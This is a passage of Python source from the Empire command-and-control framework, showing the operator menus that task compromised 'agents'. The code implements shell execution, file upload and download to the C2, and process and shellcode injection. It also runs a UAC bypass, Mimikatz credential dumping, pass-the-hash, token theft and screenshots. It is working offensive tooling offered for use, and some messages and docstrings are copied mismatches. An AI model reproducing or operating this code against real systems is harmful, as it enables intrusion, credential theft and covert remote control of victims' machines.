mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_list(self, text, line, begidx, endidx):
"Tab-complete a list command"
options = ["stale"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_kill(self, text, line, begidx, endidx):
"Tab-complete a kill command"
return self.complete_clear(text, line, begidx, endidx)
def complete_sleep(self, text, line, begidx, endidx):
"Tab-complete a sleep command"
return self.complete_clear(text, line, begidx, endidx)
def complete_lostlimit(self, text, line, begidx, endidx):
"Tab-complete a lostlimit command"
return self.complete_clear(text, line, begidx, endidx)
def complete_killdate(self, text, line, begidx, endidx):
"Tab-complete a killdate command"
return self.complete_clear(text, line, begidx, endidx)
def complete_workinghours(self, text, line, begidx, endidx):
"Tab-complete a workinghours command"
return self.complete_clear(text, line, begidx, endidx)
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class AgentMenu(SubMenu):
"""
An abstracted class used by Empire to determine which agent menu type
to instantiate.
"""
def __init__(self, mainMenu, sessionID):
agentLanguage = mainMenu.agents.get_language_db(sessionID)
if agentLanguage.lower() == 'powershell':
agent_menu = PowerShellAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
elif agentLanguage.lower() == 'python':
agent_menu = PythonAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
else:
print(helpers.color("[!] Agent language %s not recognized." % (agentLanguage)))
class PowerShellAgentMenu(SubMenu):
"""
The main class used by Empire to drive an individual 'agent' menu.
"""
def __init__(self, mainMenu, sessionID):
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# try to resolve the sessionID to a name
name = self.mainMenu.agents.get_agent_name_db(sessionID)
# set the text prompt
self.prompt = '(Empire: ' + helpers.color(name, 'red') + ') > '
        # agent commands that have opsec-safe aliases in the agent code
self.agentCommands = ['ls', 'dir', 'rm', 'del', 'cp', 'copy', 'pwd', 'cat', 'cd', 'mkdir', 'rmdir', 'mv',
'move', 'ipconfig', 'ifconfig', 'route', 'reboot', 'restart', 'shutdown', 'ps',
'tasklist', 'getpid', 'whoami', 'getuid', 'hostname']
# display any results from the database that were stored
# while we weren't interacting with the agent
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + results.rstrip('\r\n'))
# def preloop(self):
# traceback.print_stack()
def handle_agent_event(self, signal, sender):
"""
Handle agent event signals
"""
# load up the signal so we can inspect it
try:
signal_data = json.loads(signal)
except ValueError:
print(helpers.color("[!] Error: bad signal recieved {} from sender {}".format(signal, sender)))
return
if '{} returned results'.format(self.sessionID) in signal:
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + helpers.color(results))
def default(self, line):
"Default handler"
line = line.strip()
parts = line.split(' ')
if len(parts) > 0:
# check if we got an agent command
if parts[0] in self.agentCommands:
shellcmd = ' '.join(parts)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", shellcmd)
# dispatch this event
message = "[*] Tasked agent to run command {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color("[!] Command not recognized."))
print(helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands."))
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
if args[0].lower() == "agentcmds":
print("\n" + helpers.color("[*] Available opsec-safe agent commands:\n"))
print(" " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10,
indent=5) + "\n")
else:
SubMenu.do_help(self, *args)
def do_dirlist(self, line):
"Tasks an agent to store the contents of a directory in the database."
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DIR_LIST", line)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_rename(self, line):
"Rename the agent."
parts = line.strip().split(' ')
oldname = self.mainMenu.agents.get_agent_name_db(self.sessionID)
        # make sure we get a new name to rename this agent
if len(parts) == 1 and parts[0].strip() != '':
# replace the old name with the new name
result = self.mainMenu.agents.rename_agent(oldname, parts[0])
if result:
self.prompt = "(Empire: " + helpers.color(parts[0], 'red') + ") > "
else:
print(helpers.color("[!] Please enter a new name for the agent"))
def do_info(self, line):
"Display information about this agent"
# get the agent name, if applicable
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
messages.display_agent(agent)
def do_exit(self, line):
"Task agent to exit."
try:
choice = input(helpers.color("[>] Task agent to exit? [y/N] ", "red"))
if choice.lower() == "y":
self.mainMenu.agents.add_agent_task_db(self.sessionID, 'TASK_EXIT')
# dispatch this event
message = "[*] Tasked agent to exit"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to exit")
raise NavAgents
except KeyboardInterrupt:
print("")
def do_clear(self, line):
"Clear out agent tasking."
self.mainMenu.agents.clear_agent_tasks_db(self.sessionID)
def do_jobs(self, line):
"Return jobs or kill a running job."
parts = line.split(' ')
if len(parts) == 1:
if parts[0] == '':
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_GETJOBS")
# dispatch this event
message = "[*] Tasked agent to get running jobs"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get running jobs")
else:
print(helpers.color("[!] Please use form 'jobs kill JOB_ID'"))
elif len(parts) == 2:
jobID = parts[1].strip()
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_STOPJOB", jobID)
# dispatch this event
message = "[*] Tasked agent to stop job {}".format(jobID)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
def do_sleep(self, line):
"Task an agent to 'sleep interval [jitter]'"
parts = line.strip().split(' ')
if len(parts) > 0 and parts[0] != "":
delay = parts[0]
jitter = 0.0
if len(parts) == 2:
jitter = parts[1]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL",
"Set-Delay " + str(delay) + ' ' + str(jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_lostlimit(self, line):
"Task an agent to change the limit on lost agent detection"
parts = line.strip().split(' ')
if len(parts) > 0 and parts[0] != "":
lostLimit = parts[0]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-LostLimit " + str(lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to change lost limit " + str(lostLimit)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_kill(self, line):
"Task an agent to kill a particular process name or ID."
parts = line.strip().split(' ')
process = parts[0]
if process == "":
print(helpers.color("[!] Please enter a process name or ID."))
else:
# if we were passed a process ID
if process.isdigit():
command = "Stop-Process " + str(process) + " -Force"
else:
# otherwise assume we were passed a process name
# so grab all processes by this name and kill them
command = "Get-Process " + str(process) + " | %{Stop-Process $_.Id -Force}"
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command)
# dispatch this event
message = "[*] Tasked agent to kill process {}".format(process)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "Tasked agent to kill process: " + str(process)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_killdate(self, line):
"Get or set an agent's killdate (01/01/2016)."
parts = line.strip().split(' ')
date = parts[0]
if date == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Get-KillDate")
# dispatch this event
message = "[*] Tasked agent to get KillDate"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get KillDate")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("kill_date", date, self.sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-KillDate " + str(date))
# dispatch this event
message = "[*] Tasked agent to set KillDate to {}".format(date)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_workinghours(self, line):
"Get or set an agent's working hours (9:00-17:00)."
parts = line.strip().split(' ')
hours = parts[0]
if hours == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Get-WorkingHours")
# dispatch this event
message = "[*] Tasked agent to get working hours"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get working hours")
else:
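# normalize comma-separated input to the dash-delimited format that Set-WorkingHours expects (e.g. 9:00-17:00)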
hours = hours.replace(",", "-")
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("working_hours", hours, self.sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-WorkingHours " + str(hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set working hours to " + str(hours)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_shell(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "shell " + str(line))
# dispatch this event
message = "[*] Tasked agent to run shell command {}".format(line)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run shell command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_reflectiveload(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# read in the binary and base64-encode it for transport
data = open(line, "rb").read()
encoded = base64.b64encode(data).decode('latin-1')
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "reflectiveload " + encoded)
# dispatch this event
message = "[*] Tasked agent to reflectively load binary".format(line)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run shell command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_sysinfo(self, line):
"Task an agent to get system information."
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SYSINFO")
# dispatch this event
message = "[*] Tasked agent to get system information"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get system information")
def do_download(self, line):
"Task an agent to download a file into the C2."
line = line.strip()
if line != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DOWNLOAD", line)
# dispatch this event
message = "[*] Tasked agent to download {}".format(line)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to download " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_upload(self, line):
"Task the C2 to upload a file into an agent."
# "upload /path/file.ext" or "upload /path/file/file.ext newfile.ext"
# absolute paths accepted
parts = line.strip().split(' ')
uploadname = ""
if len(parts) > 0 and parts[0] != "":
if len(parts) == 1:
# if we're uploading the file with its original name
uploadname = os.path.basename(parts[0])
else:
# if we're uploading the file as a different name
uploadname = parts[1].strip()
if parts[0] != "" and os.path.exists(parts[0]):
# Check the file size against the upload limit of 1 MB
# read in the file and base64 encode it for transport
open_file = open(parts[0], 'rb')
file_data = open_file.read()
open_file.close()
size = os.path.getsize(parts[0])
if size > 1048576:
print(helpers.color("[!] File size is too large. Upload limit is 1MB."))
else:
# dispatch this event
message = "[*] Tasked agent to upload {}, {}".format(uploadname, helpers.get_file_size(file_data))
signal = json.dumps({
'print': True,
'message': message,
'file_name': uploadname,
'file_md5': hashlib.md5(file_data).hexdigest(),
'file_size': helpers.get_file_size(file_data)
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to upload %s : %s" % (parts[0], hashlib.md5(file_data).hexdigest())
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# upload packets -> "filename | script data"
file_data = helpers.encode_base64(file_data)
data = uploadname + "|" + file_data.decode("latin-1")
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data)
else:
print(helpers.color("[!] Please enter a valid file path to upload"))
def do_scriptimport(self, line):
"Imports a PowerShell script and keeps it in memory in the agent."
path = line.strip()
if path != "" and os.path.exists(path):
open_file = open(path, 'r')
script_data = open_file.read()
open_file.close()
# strip out comments and blank lines from the imported script
script_data = helpers.strip_powershell_comments(script_data)
# task the agent to import the script
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_IMPORT", script_data)
# dispatch this event
message = "[*] Tasked agent to import {}: {}".format(path,
hashlib.md5(script_data.encode('utf-8')).hexdigest())
signal = json.dumps({
'print': False,
'message': message,
'import_path': path,
'import_md5': hashlib.md5(script_data.encode('utf-8')).hexdigest()
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log with the filename and MD5
msg = "Tasked agent to import %s : %s" % (path, hashlib.md5(script_data.encode('utf-8')).hexdigest())
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# extract the functions from the script so we can tab-complete them
functions = helpers.parse_powershell_script(script_data)
# set this agent's tab-completable functions
self.mainMenu.agents.set_agent_functions_db(self.sessionID, functions)
else:
print(helpers.color("[!] Please enter a valid script path"))
def do_scriptcmd(self, line):
"Execute a function in the currently imported PowerShell script."
command = line.strip()
if command != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", command)
# dispatch this event
message = "[*] Tasked agent {} to run {}".format(self.sessionID, command)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "[*] Tasked agent %s to run %s" % (self.sessionID, command)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = "powershell/%s" % (line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID)
module_menu.cmdloop()
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
search_term = line.strip()
if search_term.strip() == "":
print(helpers.color("[!] Please enter a search term."))
else:
self.mainMenu.modules.search_modules(search_term)
def do_updateprofile(self, line):
"Update an agent connection profile."
# profile format:
# TaskURI1,TaskURI2,...|UserAgent|OptionalHeader1,OptionalHeader2...
profile = line.strip()
if profile != "":
# load up a profile from a file if a path was passed
if os.path.exists(profile):
open_file = open(profile, 'r')
profile = open_file.readlines()
open_file.close()
# strip out profile comments and blank lines
profile = [l for l in profile if not l.startswith("#") and l.strip() != ""]
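# use the first remaining non-comment line as the profile string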
profile = profile[0]
if not profile.strip().startswith("\"/"):
print(helpers.color("[!] Task URIs in profiles must start with / and be enclosed in quotes!"))
else:
updatecmd = "Update-Profile " + profile
# task the agent to update their profile
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", updatecmd)
# dispatch this event
message = "[*] Tasked agent to update profile {}".format(profile)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to update profile " + profile
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color(
"[*] Profile format is \"TaskURI1,TaskURI2,...|UserAgent|OptionalHeader2:Val1|OptionalHeader2:Val2...\""))
def do_updatecomms(self, line):
"Dynamically update the agent comms to another listener"
# generate comms for the listener selected
if line:
listenerID = line.strip()
if not self.mainMenu.listeners.is_listener_valid(listenerID):
print(helpers.color("[!] Please enter a valid listenername."))
else:
activeListener = self.mainMenu.listeners.activeListeners[listenerID]
if activeListener['moduleName'] != 'meterpreter' and activeListener['moduleName'] != 'http_mapi':
listenerOptions = activeListener['options']
listenerComms = self.mainMenu.listeners.loadedListeners[
activeListener['moduleName']].generate_comms(listenerOptions, language="powershell")
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPDATE_LISTENERNAME",
listenerOptions['Name']['Value'])
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SWITCH_LISTENER", listenerComms)
msg = "Tasked agent to update comms to %s listener" % listenerID
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color(
"[!] Ineligible listener for updatecomms command: %s" % activeListener['moduleName']))
else:
print(helpers.color("[!] Please enter a valid listenername."))
def do_psinject(self, line):
"Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>"
# get the info for the psinject module
if line:
if self.mainMenu.modules.modules['powershell/management/psinject']:
module = self.mainMenu.modules.modules['powershell/management/psinject']
listenerID = line.split(' ')[0].strip()
module.options['Listener']['Value'] = listenerID
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
if len(line.split(' ')) == 2:
target = line.split(' ')[1].strip()
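# a purely numeric target is treated as a process ID, anything else as a process name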
if target.isdigit():
module.options['ProcId']['Value'] = target
module.options['ProcName']['Value'] = ''
else:
module.options['ProcName']['Value'] = target
module.options['ProcId']['Value'] = ''
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module_menu = ModuleMenu(self.mainMenu, 'powershell/management/psinject')
module_menu.do_execute("")
else:
print(helpers.color("[!] Please enter <listenerName> <pid>"))
else:
print(helpers.color("[!] powershell/management/psinject module not loaded"))
else:
print(helpers.color("[!] Injection requires you to specify listener"))
def do_shinject(self, line):
"Inject non-meterpreter listener shellcode into a remote process. Ex. shinject <listener> <pid>"
if line:
if self.mainMenu.modules.modules['powershell/management/shinject']:
module = self.mainMenu.modules.modules['powershell/management/shinject']
listenerID = line.split(' ')[0]
arch = line.split(' ')[-1]
module.options['Listener']['Value'] = listenerID
module.options['Arch']['Value'] = arch
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
if len(line.split(' ')) == 3:
target = line.split(' ')[1].strip()
if target.isdigit():
module.options['ProcId']['Value'] = target
else:
print(helpers.color('[!] Please enter a valid process ID.'))
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module_menu = ModuleMenu(self.mainMenu, 'powershell/management/shinject')
module_menu.do_execute("")
else:
print(helpers.color('[!] Please select a valid listener'))
else:
print(helpers.color("[!] powershell/management/psinject module not loaded"))
else:
print(helpers.color("[!] Injection requires you to specify listener"))
def do_injectshellcode(self, line):
"Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>"
# get the info for the inject module
if line:
listenerID = line.split(' ')[0].strip()
pid = ''
if len(line.split(' ')) == 2:
pid = line.split(' ')[1].strip()
if self.mainMenu.modules.modules['powershell/code_execution/invoke_shellcode']:
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
module = self.mainMenu.modules.modules['powershell/code_execution/invoke_shellcode']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
if pid != '':
module.options['ProcessID']['Value'] = pid
module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode')
module_menu.cmdloop()
else:
print(helpers.color("[!] Please enter <listenerName> <pid>"))
else:
print(helpers.color("[!] powershell/code_execution/invoke_shellcode module not loaded"))
else:
print(helpers.color("[!] Injection requires you to specify listener"))
def do_sc(self, line):
"Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]"
# get the info for the screenshot module
if len(line.strip()) > 0:
# JPEG compression ratio
try:
screenshot_ratio = str(int(line.strip()))
except Exception:
print(helpers.color("[*] JPEG Ratio incorrect. Has been set to 80."))
screenshot_ratio = "80"
else:
screenshot_ratio = ''
if self.mainMenu.modules.modules['powershell/collection/screenshot']:
module = self.mainMenu.modules.modules['powershell/collection/screenshot']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module.options['Ratio']['Value'] = screenshot_ratio
# execute the screenshot module
module_menu = ModuleMenu(self.mainMenu, 'powershell/collection/screenshot')
module_menu.do_execute("")
else:
print(helpers.color("[!] powershell/collection/screenshot module not loaded"))
def do_spawn(self, line):
"Spawns a new Empire agent for the given listener name. Ex. spawn <listener>"
# get the info for the spawn module
if line:
listenerID = line.split(' ')[0].strip()
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
# ensure the spawn module is loaded
if self.mainMenu.modules.modules['powershell/management/spawn']:
module = self.mainMenu.modules.modules['powershell/management/spawn']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# jump to the spawn module
module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn")
module_menu.cmdloop()
else:
print(helpers.color("[!] management/spawn module not loaded"))
else:
print(helpers.color("[!] Please enter a valid listener name or ID."))
else:
print(helpers.color("[!] Please specify a listener name or ID."))
def do_bypassuac(self, line):
"Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>"
# get the info for the bypassuac module
if line:
listenerID = line.split(' ')[0].strip()
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
# ensure the bypassuac module is loaded
if self.mainMenu.modules.modules['powershell/privesc/bypassuac_eventvwr']:
module = self.mainMenu.modules.modules['powershell/privesc/bypassuac_eventvwr']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# jump to the bypassuac module
module_menu = ModuleMenu(self.mainMenu, 'powershell/privesc/bypassuac_eventvwr')
module_menu.do_execute('')
else:
print(helpers.color("[!] powershell/privesc/bypassuac_eventvwr module not loaded"))
else:
print(helpers.color("[!] Please enter a valid listener name or ID."))
else:
print(helpers.color("[!] Please specify a listener name or ID."))
def do_mimikatz(self, line):
"Runs Invoke-Mimikatz on the client."
# ensure the credentials/mimikatz/logonpasswords module is loaded
if self.mainMenu.modules.modules['powershell/credentials/mimikatz/logonpasswords']:
module = self.mainMenu.modules.modules['powershell/credentials/mimikatz/logonpasswords']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the Mimikatz module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/mimikatz/logonpasswords')
module_menu.do_execute('')
def do_pth(self, line):
"Executes PTH for a CredID through Mimikatz."
credID = line.strip()
if credID == '':
print(helpers.color("[!] Please specify a <CredID>."))
return
if self.mainMenu.modules.modules['powershell/credentials/mimikatz/pth']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/mimikatz/pth')
module = self.mainMenu.modules.modules['powershell/credentials/mimikatz/pth']
# set mimikatz/pth to use the given CredID
module.options['CredID']['Value'] = credID
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the mimikatz/pth module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/mimikatz/pth')
module_menu.do_execute('')
def do_steal_token(self, line):
"Uses credentials/tokens to impersonate a token for a given process ID."
processID = line.strip()
if processID == '':
print(helpers.color("[!] Please specify a process ID."))
return
if self.mainMenu.modules.modules['powershell/credentials/tokens']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/tokens')
module = self.mainMenu.modules.modules['powershell/credentials/tokens']
# set credentials/token to impersonate the given process ID token
module.options['ImpersonateUser']['Value'] = 'True'
module.options['ProcessID']['Value'] = processID
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the token module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/tokens')
module_menu.do_execute('')
# run a sysinfo to update
self.do_sysinfo(line)
def do_revtoself(self, line):
"Uses credentials/tokens to revert token privileges."
if self.mainMenu.modules.modules['powershell/credentials/tokens']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/tokens')
module = self.mainMenu.modules.modules['powershell/credentials/tokens']
# set credentials/token to revert to self
module.options['RevToSelf']['Value'] = "True"
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the token module
module_menu = ModuleMenu(self.mainMenu, "powershell/credentials/tokens")
module_menu.do_execute('')
# run a sysinfo to update
self.do_sysinfo(line)
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def complete_reflectiveload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
def complete_updatecomms(self, text, line, begidx, endidx):
"Tab-complete updatecomms option values"
return self.complete_psinject(text, line, begidx, endidx)
def complete_shinject(self, text, line, begidx, endidx):
"Tab-complete psinject option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_psinject(self, text, line, begidx, endidx):
"Tab-complete psinject option values."
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in self.mainMenu.listeners.get_listener_names() if s.startswith(mline)]
def complete_injectshellcode(self, text, line, begidx, endidx):
"Tab-complete injectshellcode option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_spawn(self, text, line, begidx, endidx):
"Tab-complete spawn option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_bypassuac(self, text, line, begidx, endidx):
"Tab-complete bypassuac option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_jobs(self, text, line, begidx, endidx):
"Tab-complete jobs management options."
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in ["kill"] if s.startswith(mline)]
def complete_scriptimport(self, text, line, begidx, endidx):
"Tab-complete a PowerShell script path"
return helpers.complete_path(text, line)
def complete_scriptcmd(self, text, line, begidx, endidx):
"Tab-complete a script cmd set."
functions = self.mainMenu.agents.get_agent_functions(self.sessionID)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in functions if s.startswith(mline)]
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx, language='powershell')
def complete_upload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
def complete_updateprofile(self, text, line, begidx, endidx):
"Tab-complete an updateprofile path"
return helpers.complete_path(text, line)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class PythonAgentMenu(SubMenu):
def __init__(self, mainMenu, sessionID):
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# try to resolve the sessionID to a name
name = self.mainMenu.agents.get_agent_name_db(sessionID)
# set the text prompt
self.prompt = '(Empire: ' + helpers.color(name, 'red') + ') > '
# listen for messages from this specific agent
# dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# agent commands that have opsec-safe aliases in the agent code
self.agentCommands = ['ls', 'rm', 'pwd', 'mkdir', 'whoami', 'getuid', 'hostname']
# display any results from the database that were stored
# while we weren't interacting with the agent
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + results.rstrip('\r\n'))
def handle_agent_event(self, signal, sender):
"""
Handle agent event signals
"""
# load up the signal so we can inspect it
try:
signal_data = json.loads(signal)
except ValueError:
print(helpers.color("[!] Error: bad signal recieved {} from sender {}".format(signal, sender)))
return
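# only surface results that belong to this agent's session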
if '{} returned results'.format(self.sessionID) in signal:
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + helpers.color(results))
def default(self, line):
"Default handler"
line = line.strip()
parts = line.split(' ')
